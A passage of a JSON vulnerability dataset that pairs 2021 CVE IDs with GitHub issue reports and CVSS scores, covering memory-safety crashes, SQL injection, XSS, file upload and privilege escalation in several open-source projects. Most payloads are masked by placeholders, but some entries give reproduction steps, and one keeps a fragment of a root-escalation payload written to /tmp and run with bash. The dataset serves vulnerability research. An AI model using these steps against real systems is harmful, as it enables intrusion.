  75274. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1974",
  75275. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1974",
  75276. "Repo_new": "gpac/gpac",
  75277. "Issue_Created_At": "2021-12-11T01:02:59Z",
  75278. "description": "Invalid call in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
  75279. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75280. "severity": "MEDIUM",
  75281. "baseScore": 5.5,
  75282. "impactScore": 3.6,
  75283. "exploitabilityScore": 1.8
  75284. },
  75285. {
  75286. "CVE_ID": "CVE-2021-45764",
  75287. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1971",
  75288. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1971",
  75289. "Repo_new": "gpac/gpac",
  75290. "Issue_Created_At": "2021-12-10T15:59:06Z",
  75291. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  75292. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75293. "severity": "MEDIUM",
  75294. "baseScore": 5.5,
  75295. "impactScore": 3.6,
  75296. "exploitabilityScore": 1.8
  75297. },
  75298. {
  75299. "CVE_ID": "CVE-2021-45767",
  75300. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1982",
  75301. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1982",
  75302. "Repo_new": "gpac/gpac",
  75303. "Issue_Created_At": "2021-12-14T02:23:22Z",
  75304. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG CODETAG Result The result is omitted here. gdb The gdb result is omitted here.",
  75305. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75306. "severity": "MEDIUM",
  75307. "baseScore": 5.5,
  75308. "impactScore": 3.6,
  75309. "exploitabilityScore": 1.8
  75310. },
  75311. {
  75312. "CVE_ID": "CVE-2021-45769",
  75313. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/368",
  75314. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/368",
  75315. "Repo_new": "mz-automation/libiec61850",
  75316. "Issue_Created_At": "2021-12-23T00:53:55Z",
  75317. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG eeb6f0 System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc APITAG command: APITAG Result ERRORTAG gdb ERRORTAG",
  75318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75319. "severity": "HIGH",
  75320. "baseScore": 7.5,
  75321. "impactScore": 3.6,
  75322. "exploitabilityScore": 3.9
  75323. },
  75324. {
  75325. "CVE_ID": "CVE-2021-45773",
  75326. "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/100",
  75327. "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/100",
  75328. "Repo_new": "mz-automation/lib60870",
  75329. "Issue_Created_At": "2021-12-23T06:01:26Z",
  75330. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. If the APITAG is NULL, APITAG will crash. Should there be a check? version NUMBERTAG d5e NUMBERTAG e System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz gdb ERRORTAG ERRORTAG",
  75331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75332. "severity": "HIGH",
  75333. "baseScore": 7.5,
  75334. "impactScore": 3.6,
  75335. "exploitabilityScore": 3.9
  75336. },
  75337. {
  75338. "CVE_ID": "CVE-2021-45786",
  75339. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/747",
  75340. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/747",
  75341. "Repo_new": "magicblack/maccms10",
  75342. "Issue_Created_At": "2021-11-12T07:46:08Z",
  75343. "description": "There is an arbitrary user login vulnerability. View the login code\uff0c FILETAG In addition to logging in through the user name and password, you can also log in through the \"col\" and \"openid\" parameters, But these two parameters are completely controllable. That causing any user to login vulnerability poc\uff1a APITAG Local test results\uff1a APITAG APITAG",
  75344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75345. "severity": "CRITICAL",
  75346. "baseScore": 9.8,
  75347. "impactScore": 5.9,
  75348. "exploitabilityScore": 3.9
  75349. },
  75350. {
  75351. "CVE_ID": "CVE-2021-45787",
  75352. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/746",
  75353. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/746",
  75354. "Repo_new": "magicblack/maccms10",
  75355. "Issue_Created_At": "2021-11-11T07:08:11Z",
  75356. "description": "\u7f51\u7ad9\u540e\u53f0\u5b58\u6dfb\u52a0\u89c6\u9891\u5904\u5b58\u5728\u5b58\u50a8\u578bXSS\u6f0f\u6d1e. APITAG FILETAG \u63d2\u5165\u7684xss\u4ee3\u7801\u4e5f\u4f1a\u5728\u524d\u53f0\u88ab\u6267\u884c FILETAG APITAG \u53e6\u5916\uff0c\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0\u5904\u4e5f\u6709\u76f8\u540c\u95ee\u9898",
  75357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75358. "severity": "MEDIUM",
  75359. "baseScore": 5.4,
  75360. "impactScore": 2.7,
  75361. "exploitabilityScore": 2.3
  75362. },
  75363. {
  75364. "CVE_ID": "CVE-2021-45791",
  75365. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/200",
  75366. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/200",
  75367. "Repo_new": "slims/slims8_akasia",
  75368. "Issue_Created_At": "2021-12-21T07:05:29Z",
  75369. "description": "Security Bugs] Multiple Sql Injection. Hello, I found some serious bugs in Slims8 Akasia NUMBERTAG latest version). First of all, there is a SQL injection bug. This injection exists in multiple files, and the file where the search keyword $_GET['dir'] is located all has SQL injection. url:[ URLTAG url CODETAG '.urldecode($_GET $_fld_sort]).' CODETAG You have escaped the dir string. But in fact it just appends a backslash \\ before', \"or \\. Reference from PHP mysql_real_escape_string Therefore, if my GET variable dir does not contain these characters, sql injection will be triggered. SQL injection demonstration APITAG SQL injection demonstration APITAG Example: [ URLTAG url APITAG APITAG List some pages with SQL injection: CODETAG",
  75370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75371. "severity": "HIGH",
  75372. "baseScore": 8.8,
  75373. "impactScore": 5.9,
  75374. "exploitabilityScore": 2.8
  75375. },
  75376. {
  75377. "CVE_ID": "CVE-2021-45792",
  75378. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/122",
  75379. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/122",
  75380. "Repo_new": "slims/slims9_bulian",
  75381. "Issue_Created_At": "2021-12-22T08:39:34Z",
  75382. "description": "APITAG APITAG cross site script attacks\uff08xss\uff09. Describe the bug Storage type xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site script attacks. To Reproduce Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site scripting attacks. Administrator login \"system\" add new \"field> fill in cross site scripting in the NOTE field APITAG It will take effect after saving. Expected behavior You can insert js scripts to attack. Screenshots APITAG APITAG Desktop : OS: APITAG M1] Browser APITAG Version APITAG",
  75383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  75384. "severity": "MEDIUM",
  75385. "baseScore": 4.8,
  75386. "impactScore": 2.7,
  75387. "exploitabilityScore": 1.7
  75388. },
  75389. {
  75390. "CVE_ID": "CVE-2021-45793",
  75391. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/123",
  75392. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/123",
  75393. "Repo_new": "slims/slims9_bulian",
  75394. "Issue_Created_At": "2021-12-22T09:49:53Z",
  75395. "description": "APITAG Bugs] Sql Injection. SQL injection exists in the FILETAG file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login \"find a book\" SQL injection attack in the comments (example: APITAG ) APITAG APITAG CODETAG CODETAG",
  75396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75397. "severity": "HIGH",
  75398. "baseScore": 7.5,
  75399. "impactScore": 3.6,
  75400. "exploitabilityScore": 3.9
  75401. },
  75402. {
  75403. "CVE_ID": "CVE-2021-45794",
  75404. "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/124",
  75405. "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/124",
  75406. "Repo_new": "slims/slims9_bulian",
  75407. "Issue_Created_At": "2021-12-22T14:29:35Z",
  75408. "description": "APITAG Bugs] SQL Injection. SQL injection exists in the PATHTAG file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: APITAG Vulnerable parameter id SQL injection payload CODETAG CODETAG APITAG The problematic code CODETAG",
  75409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75410. "severity": "HIGH",
  75411. "baseScore": 7.5,
  75412. "impactScore": 3.6,
  75413. "exploitabilityScore": 3.9
  75414. },
  75415. {
  75416. "CVE_ID": "CVE-2021-45806",
  75417. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/166",
  75418. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/166",
  75419. "Repo_new": "jpressprojects/jpress",
  75420. "Issue_Created_At": "2022-01-09T08:23:43Z",
  75421. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4fee\u6539. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a APITAG FILETAG \u70b9\u51fb\u66f4\u65b0\u6587\u4ef6 FILETAG \u8bbf\u95ee URLTAG \uff0c\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u9a8c\u8bc1\u6210\u529f FILETAG",
  75422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75423. "severity": "HIGH",
  75424. "baseScore": 8.8,
  75425. "impactScore": 5.9,
  75426. "exploitabilityScore": 2.8
  75427. },
  75428. {
  75429. "CVE_ID": "CVE-2021-45807",
  75430. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/167",
  75431. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/167",
  75432. "Repo_new": "jpressprojects/jpress",
  75433. "Issue_Created_At": "2022-01-09T08:36:56Z",
  75434. "description": "jfinal\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6076\u610f\u63d2\u4ef6. \u5ba1\u8ba1\u8fc7\u7a0b jpress\u540e\u53f0\u63d0\u4f9b\u4e86\u63d2\u4ef6\u5b89\u88c5\u529f\u80fd\uff0c\u5728 APITAG \u7684 APITAG \u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u7684\u4f5c\u7528\u662f\u5148\u5904\u7406\u6587\u4ef6\u4e0a\u4f20\uff0c\u7136\u540e\u8fdb\u884c\u63d2\u4ef6\u5b89\u88c5 FILETAG \u6587\u4ef6\u4e0a\u4f20\u7684\u6b65\u9aa4\u7565\uff0c\u76f4\u63a5\u770b\u5b89\u88c5\u90e8\u5206 FILETAG \u8ddf\u8fdb APITAG \u65b9\u6cd5\uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u4e2d\uff0c\u5148\u8c03\u7528\u4e86\u4e00\u4e0b APITAG \u8bfb\u53d6\u63d2\u4ef6\u4fe1\u606f FILETAG \u8ddf\u8fdb APITAG \uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u9762\u4f1a\u521b\u5efa\u4e00\u4e2a\u7c7b\u52a0\u8f7d\u5668\u6765\u52a0\u8f7d\u63d2\u4ef6\u91cc\u7684\u7c7b FILETAG \u8ddf\u8fdb APITAG APITAG \u5148\u52a0\u8f7d\u7c7b FILETAG APITAG FILETAG \u63a5\u4e0b\u6765\u5728\u5904\u7406\u8bf7\u6c42\u65f6\u5c31\u4f1a\u5229\u7528\u5230\u8fd9\u4e9bcontroller NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG URLTAG FILETAG",
  75435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75436. "severity": "CRITICAL",
  75437. "baseScore": 9.8,
  75438. "impactScore": 5.9,
  75439. "exploitabilityScore": 3.9
  75440. },
  75441. {
  75442. "CVE_ID": "CVE-2021-45808",
  75443. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/173",
  75444. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/173",
  75445. "Repo_new": "jpressprojects/jpress",
  75446. "Issue_Created_At": "2022-01-09T08:55:24Z",
  75447. "description": "jpress\u524d\u53f0\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. FILETAG",
  75448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75449. "severity": "HIGH",
  75450. "baseScore": 8.8,
  75451. "impactScore": 5.9,
  75452. "exploitabilityScore": 2.8
  75453. },
  75454. {
  75455. "CVE_ID": "CVE-2021-45809",
  75456. "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/113",
  75457. "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/113",
  75458. "Repo_new": "yuezk/globalprotect-openconnect",
  75459. "Issue_Created_At": "2021-12-21T13:35:33Z",
  75460. "description": "Trivially Exploitable Priviledge Escalation Vulnerability. The way APITAG Openconnect is set up enables arbitrary users to execute commands as root NUMBERTAG Install the payload; in this case, a demonstration payload installing itself to PATHTAG echo e ' PATHTAG NUMBERTAG PATHTAG a NUMBERTAG PATHTAG > /tmp/groot; bash /tmp/groot NUMBERTAG Specify openconnect parameters: APITAG NUMBERTAG Log into any VPN service This vulnerability can be executed by any user, even a \"nobody\" user covertly by sending commands to the APITAG . This vulnerability can be executed by a user with keyboard access to install a rootkit using the GUI you provided. This vulnerability can be executed as soon as openconnect globalprotect is installed; even if the APITAG systemd service has not been started as the unit file specifies: APITAG . I had to explicitly mask the service to mitigate the vulnerability. As such, it leaves any host who even has the program installed highly vulnerable; this is the worst case among privilege escalation vulnerabilities. For a secure by default configuration, openconnect global needs to be updated, so administrator approval is needed to allow specific globalprotect servers or a change in command line parameters. I propose a root editable configuration file /etc/openconnect APITAG with the following syntax karolin . APITAG i cupdev PATHTAG This entry allows the user karolin to connect to any vpn servers with a domain suffix APITAG and the specified openconnect parameters. Groups may be specified by prefixing the user with APITAG . The app could implement a config editing feature, allowing users to edit the configuration graphically after specifying the administrator password. I would also suggest disabling systemd dbus activation altogether just to avoid the entire issue of a security bug sticking around even with a stopped unit. Thank you for all your hard work!",
  75461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75462. "severity": "CRITICAL",
  75463. "baseScore": 9.8,
  75464. "impactScore": 5.9,
  75465. "exploitabilityScore": 3.9
  75466. },
  75467. {
  75468. "CVE_ID": "CVE-2021-45810",
  75469. "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/114",
  75470. "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/114",
  75471. "Repo_new": "yuezk/globalprotect-openconnect",
  75472. "Issue_Created_At": "2021-12-21T13:37:56Z",
  75473. "description": "Easy to exploit host traffic redirection vulnerability. Joining a VPN does not require administrator access; a malicious party hosting any openconnect server can redirect the host's network traffic over via their own server. This vulnerability is executed by\u2026simply logging into their own server. The same preconditions apply as to NUMBERTAG Note that hosting a global protect server is not necessary, if commands are sent directly to the DBUS service. In this case, hosting any openconnect supported VPN server will suffice. Proposed Fix See NUMBERTAG as both vulnerabilities have the same fix.",
  75474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  75475. "severity": "HIGH",
  75476. "baseScore": 7.5,
  75477. "impactScore": 3.6,
  75478. "exploitabilityScore": 3.9
  75479. },
  75480. {
  75481. "CVE_ID": "CVE-2021-45821",
  75482. "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/6",
  75483. "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/6",
  75484. "Repo_new": "btiteam/xbtit-3.1",
  75485. "Issue_Created_At": "2021-12-22T20:18:47Z",
  75486. "description": "Blind SQL Injection affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Description A blind SQL Injection vulnerability exists in Xbtit NUMBERTAG and APITAG NUMBERTAG ia the sid parameter (GET) in FILETAG file that is accessible by a simple registered user with default privileges. As a result a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to gain remote code execution. FILETAG APITAG NUMBERTAG FILETAG sid parameter) affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Login as a simple user make a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following APITAG and cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be a valid chat message id you have already generated! APITAG FILETAG FILETAG FILETAG FILETAG APITAG APITAG APITAG NUMBERTAG is also affected by the same issue. APITAG NUMBERTAG FILETAG msgid parameter) affecting only APITAG NUMBERTAG APITAG NUMBERTAG has additionally functionality on the file named ( FILETAG ) that has a vulnerable GET\u00a0id parameter (msgid) that offers almost similar functionality. So we can apply the same on /chatedit.php instead of FILETAG and msgid (GET) instead of sid (GET) parameter. The following APITAG will cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be a valid chat message id you have already generated. APITAG FILETAG",
  75487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75488. "severity": "HIGH",
  75489. "baseScore": 8.8,
  75490. "impactScore": 5.9,
  75491. "exploitabilityScore": 2.8
  75492. },
  75493. {
  75494. "CVE_ID": "CVE-2021-45822",
  75495. "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/7",
  75496. "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/7",
  75497. "Repo_new": "btiteam/xbtit-3.1",
  75498. "Issue_Created_At": "2021-12-22T20:25:58Z",
  75499. "description": "Stored & Reflected XSS affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Reflected XSS The / FILETAG ?page=torrent details is actually FILETAG called through page parameter from APITAG The id parameter (GET ) is vulnerable to Reflected XSS. The APITAG contains the following xss payload ERRORTAG FILETAG FILETAG Stored XSS The FILETAG page is vulnerable to Stored XSS thought the n parameter (POST). This is the modified POST request to send a message to the chat box that contains the following APITAG XSS payload appended to the n parameter (POST) in URL encoded format that contains the username of the user that will post the message. ERRORTAG FILETAG FILETAG FILETAG",
  75500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75501. "severity": "MEDIUM",
  75502. "baseScore": 6.1,
  75503. "impactScore": 2.7,
  75504. "exploitabilityScore": 2.8
  75505. },
  75506. {
  75507. "CVE_ID": "CVE-2021-45829",
  75508. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1317",
  75509. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1317",
  75510. "Repo_new": "hdfgroup/hdf5",
  75511. "Issue_Created_At": "2021-12-18T13:57:17Z",
  75512. "description": "segmentation fault in h5stat. Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information CODETAG",
  75513. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75514. "severity": "MEDIUM",
  75515. "baseScore": 5.5,
  75516. "impactScore": 3.6,
  75517. "exploitabilityScore": 1.8
  75518. },
  75519. {
  75520. "CVE_ID": "CVE-2021-45830",
  75521. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1314",
  75522. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1314",
  75523. "Repo_new": "hdfgroup/hdf5",
  75524. "Issue_Created_At": "2021-12-18T13:32:06Z",
  75525. "description": "heap buffer overflow APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
  75526. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75527. "severity": "MEDIUM",
  75528. "baseScore": 5.5,
  75529. "impactScore": 3.6,
  75530. "exploitabilityScore": 1.8
  75531. },
  75532. {
  75533. "CVE_ID": "CVE-2021-45831",
  75534. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1990",
  75535. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1990",
  75536. "Repo_new": "gpac/gpac",
  75537. "Issue_Created_At": "2021-12-14T11:19:27Z",
  75538. "description": "Null Pointer Dereference in __strlen_a NUMBERTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG Gdb information CODETAG",
  75539. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75540. "severity": "MEDIUM",
  75541. "baseScore": 5.5,
  75542. "impactScore": 3.6,
  75543. "exploitabilityScore": 1.8
  75544. },
  75545. {
  75546. "CVE_ID": "CVE-2021-45832",
  75547. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1315",
  75548. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1315",
  75549. "Repo_new": "hdfgroup/hdf5",
  75550. "Issue_Created_At": "2021-12-18T13:38:31Z",
  75551. "description": "stack overflow at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
  75552. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75553. "severity": "MEDIUM",
  75554. "baseScore": 5.5,
  75555. "impactScore": 3.6,
  75556. "exploitabilityScore": 1.8
  75557. },
  75558. {
  75559. "CVE_ID": "CVE-2021-45833",
  75560. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1313",
  75561. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1313",
  75562. "Repo_new": "hdfgroup/hdf5",
  75563. "Issue_Created_At": "2021-12-18T13:08:16Z",
  75564. "description": "stack buffer overflow at APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG ASAN information ERRORTAG",
  75565. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75566. "severity": "MEDIUM",
  75567. "baseScore": 5.5,
  75568. "impactScore": 3.6,
  75569. "exploitabilityScore": 1.8
  75570. },
  75571. {
  75572. "CVE_ID": "CVE-2021-45834",
  75573. "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/330",
  75574. "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/330",
  75575. "Repo_new": "opendocman/opendocman",
  75576. "Issue_Created_At": "2022-03-17T13:27:08Z",
  75577. "description": "Security Vulnerability Unrestricted File Upload. Describe the bug Attacker can upload files with dangerous types to the APITAG NUMBERTAG ia FILETAG using MIME bypass. File is available under specific ID, which is returned in response from application. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to the application NUMBERTAG Click on APITAG Document NUMBERTAG Create a file named APITAG containing string: APITAG NUMBERTAG The document is being successfully uploaded and the APITAG header is describing the location of the file NUMBERTAG The file is available under provided ID with .dat extension under /document_repository directory. Expected behavior Application should reject the file based on the magic bytes provided. Screenshots Step NUMBERTAG Adding the document with malicious content. FILETAG Step NUMBERTAG Retrieving the content. FILETAG Versions (where applicable): APITAG NUMBERTAG APITAG NUMBERTAG PHP NUMBERTAG Web Server Type: Apache Web Server Version NUMBERTAG OS: [e.g. iOS] Kali APITAG Browser [e.g. chrome, safari] Firefox Browser Version [e.g NUMBERTAG esr",
  75578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75579. "severity": "CRITICAL",
  75580. "baseScore": 9.8,
  75581. "impactScore": 5.9,
  75582. "exploitabilityScore": 3.9
  75583. },
  75584. {
  75585. "CVE_ID": "CVE-2021-45834",
  75586. "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/326",
  75587. "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/326",
  75588. "Repo_new": "opendocman/opendocman",
  75589. "Issue_Created_At": "2021-08-02T17:49:53Z",
  75590. "description": "Trying to get in touch regarding a security issue. Hi there, I couldn't find a APITAG in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy URLTAG is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks! (cc APITAG helper)",
  75591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75592. "severity": "CRITICAL",
  75593. "baseScore": 9.8,
  75594. "impactScore": 5.9,
  75595. "exploitabilityScore": 3.9
  75596. },
  75597. {
  75598. "CVE_ID": "CVE-2021-45835",
  75599. "Issue_Url_old": "https://github.com/rskoolrash/Online-Admission-System/issues/2",
  75600. "Issue_Url_new": "https://github.com/rskoolrash/online-admission-system/issues/2",
  75601. "Repo_new": "rskoolrash/online-admission-system",
  75602. "Issue_Created_At": "2021-12-23T12:27:37Z",
  75603. "description": "Security Vulnerability. Hello, I'm trying to reach you regarding security vulnerability I have found in your application. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks!",
  75604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75605. "severity": "CRITICAL",
  75606. "baseScore": 9.8,
  75607. "impactScore": 5.9,
  75608. "exploitabilityScore": 3.9
  75609. },
  75610. {
  75611. "CVE_ID": "CVE-2021-45846",
  75612. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5117",
  75613. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5117",
  75614. "Repo_new": "slic3r/slic3r",
  75615. "Issue_Created_At": "2021-12-26T17:21:29Z",
  75616. "description": "NULL pointer dereference in AMF XML parser (metadata tag without type attribute). Summary A crafted AMF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Cause An attempt is made to read the type attribute of the APITAG tag, at APITAG URLTAG . The APITAG contains a metadata tag without a type attribute. APITAG returns NULL, and thus the creation of the APITAG crashes. Impact Denial of Service. Proposed mitigation Check for NULL before trying to construct the APITAG , set a default value or reject the tag. Similar checks are already in place at line NUMBERTAG URLTAG and others.",
  75617. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75618. "severity": "MEDIUM",
  75619. "baseScore": 5.5,
  75620. "impactScore": 3.6,
  75621. "exploitabilityScore": 1.8
  75622. },
  75623. {
  75624. "CVE_ID": "CVE-2021-45847",
  75625. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5118",
  75626. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5118",
  75627. "Repo_new": "slic3r/slic3r",
  75628. "Issue_Created_At": "2021-12-26T20:32:19Z",
  75629. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (vertex tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where strtof receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
  75630. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75631. "severity": "MEDIUM",
  75632. "baseScore": 5.5,
  75633. "impactScore": 3.6,
  75634. "exploitabilityScore": 1.8
  75635. },
  75636. {
  75637. "CVE_ID": "CVE-2021-45847",
  75638. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5119",
  75639. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5119",
  75640. "Repo_new": "slic3r/slic3r",
